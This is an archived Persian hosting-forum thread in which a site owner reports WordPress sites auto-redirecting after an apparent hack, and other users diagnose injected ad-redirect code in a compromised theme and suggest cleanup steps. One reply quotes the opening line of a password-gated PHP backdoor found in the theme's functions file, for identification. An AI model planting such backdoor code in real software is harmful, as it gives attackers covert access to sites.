PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : مشکل در ریدایرکت شدن خودکار سایت

sh.shirdel02
November 12th, 2017, 21:11
سلام
امروز صبح که وارد سایتم شدم دیدم سایتم خود به خود ریدایرکت میشه برروی یکسری ادرس دیگر .
به میزبان هاستم تیکت زدم گفت که قالبهای سایت ها ویروسی شده
البته نا گفته نماند که در هاستم چنتا دامنه دیگر دارم با قالبهای متفاوت اونهام همینجوری شده
لطفا اگر کسی میدونه چطوری میتونم ایرادم را برطرف کنم راهنمایم کنه
درضمن افزونه ایم خیلی وقته که نصب نکردم و قالبمم نزدیک یکسالی هست که دارم ازش استفاده میکنم

ادرس سایتام را براتون میزارم تا بررسی کنید

top-travel.ir
touchnet.ir
dlina.ir
good-travel.ir

انگار که ویروس داخل هاست به همه سایتام منتقل شده

vpgroup
November 12th, 2017, 21:27
با سلام و احترام

سی ام اس ها وردپرس اند ؟! محتوای فایل htaccess رو قرار بدین . تغییراتی یا دسترسی به کسی دادین ؟!

موفق باشید

sh.shirdel02
November 12th, 2017, 21:30
نه به کسی دسترسی ندادم

hamid99
November 12th, 2017, 21:31
سلام
امروز صبح که وارد سایتم شدم دیدم سایتم خود به خود ریدایرکت میشه برروی یکسری ادرس دیگر .
به میزبان هاستم تیکت زدم گفت که قالبهای سایت ها ویروسی شده
البته نا گفته نماند که در هاستم چنتا دامنه دیگر دارم با قالبهای متفاوت اونهام همینجوری شده
لطفا اگر کسی میدونه چطوری میتونم ایرادم را برطرف کنم راهنمایم کنه
درضمن افزونه ایم خیلی وقته که نصب نکردم و قالبمم نزدیک یکسالی هست که دارم ازش استفاده میکنم

ادرس سایتام را براتون میزارم تا بررسی کنید

top-travel.ir
touchnet.ir
dlina.ir
good-travel.ir

انگار که ویروس داخل هاست به همه سایتام منتقل شده
داداش هک شدی انتی ویروس هم اخطار داد جالبه چطور هاست بهتون اخطار نداده. زود تر مشکلش رو حل کنید تا گوگل ایندکس نکرده وگرنه دردسرش دوباره اعتماد کردن گوگل خیلیه

sazsaz
November 12th, 2017, 21:33
سلام با تلگرام بنده در ارتباط باشید

sh.shirdel02
November 12th, 2017, 21:33
خب نمیدونم چطور درستش کنم

hamid99
November 12th, 2017, 21:35
خب نمیدونم چطور درستش کنم
جدیدا پلاگین یا قالبی نصب نکردی

vpgroup
November 12th, 2017, 21:36
سلام با تلگرام بنده در ارتباط باشید

عرض ادب مجدد

با جناب پارسایی در تماس باشید مشکلتون رو حل میکنند

موفق باشید

hamid99
November 12th, 2017, 21:39
تو سایت http://forum.wp-parsi.com که منبعش هست راه حلش هست چون اکثرا پلاگین و قالب نال استفاده میکنن و بهتون توصیه میکنم به هیچ کس دسترسی ندین

WiseHost
November 12th, 2017, 21:42
از قالبتون هست. نیازبه بررسی داره تا دقیقامعلوم شه کدوم فایل ریدذایرکت گزاشتن
فعالا بهترین کار برای اول کار تغییر قالبه تا دقیقا قالبتون پاکسازی شه

سیدرضا بازیار
November 12th, 2017, 21:44
درود
در سایت شما یه کد تعبیه شده که واسه شرکت ادسترا هست...
این کد رو شرکت های پاپ آپ در ایران رواج دادن و متاسفانه هکر ها پس از هک کردن یه سایت، بجای دیفیس این کار رو میکنن تا براشون درامد داشته باشه
احتمالا فقط ایندکس یا هدر شما رو دستکاری کرده باشن

sazsaz
November 12th, 2017, 21:46
آیا در پایگاه داده جدولی با نام wp_datalist دارید ؟

- - - Updated - - -

آیا این کد در فایل فانکشن شما هست ؟

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '8c59047702c59779a2330fcff0c28874'))

esmaeil1
November 12th, 2017, 21:53
بله هست تو قالب من که اینطور شده هست

sazsaz
November 12th, 2017, 22:01
این لینک را بررسی کنید
ببخشید توی اون سایت زدم چون اینجا آنتی ویروس اجازه نمی ده این پست را بزنم
http://wpir.ir/thread32.html

MJmoonwalk
November 12th, 2017, 23:52
محتوای سایت رو بیار توی سیستم خودت. با Dreamweaver توی تمامی فایل های پوشه سایت هات آدرس هایی که باز میشن رو جستجو کن ببین کدوم فایلت آلوده هست.

modireserver
November 12th, 2017, 23:59
سلام
ابتدا هاست خودتونو سریعا تغییر بدید اگر بکاپ دارید آخرین بکاپ سالم سایت رو بالا بیارید، سایت رو رو حالت تعمیر ببرید و فعلا از دسترس خارجش کنید، اگر قالب سایت رو از جای نامعتبر و مشکوک دانلود کردید سریعا یک قالب مناسب جایگزین کنید بعد افزونه های نصب شده روی سایت رو تماما آپدیت کنید و بعد فایل htaccess. رو دقیقا بررسی کنید و هر خط مشکوک که به ریدایرکت دلالت داره رو حذف کنید، دسترسی و یوزرهای موجود بر روی سایت رو چک کنید و پسوردتونو سریعا تغییر بدید و در صورت امکان سایت رو ببرید رو یک هاست مجهز به cxs و از میزبان بخواهید هاستتون رو سریعا یک اسکن کنه و نتیحه رو به شما بگه، انشاالله رفع میشه اگر باز نشد بگید راهنمایی های بعد رو بگم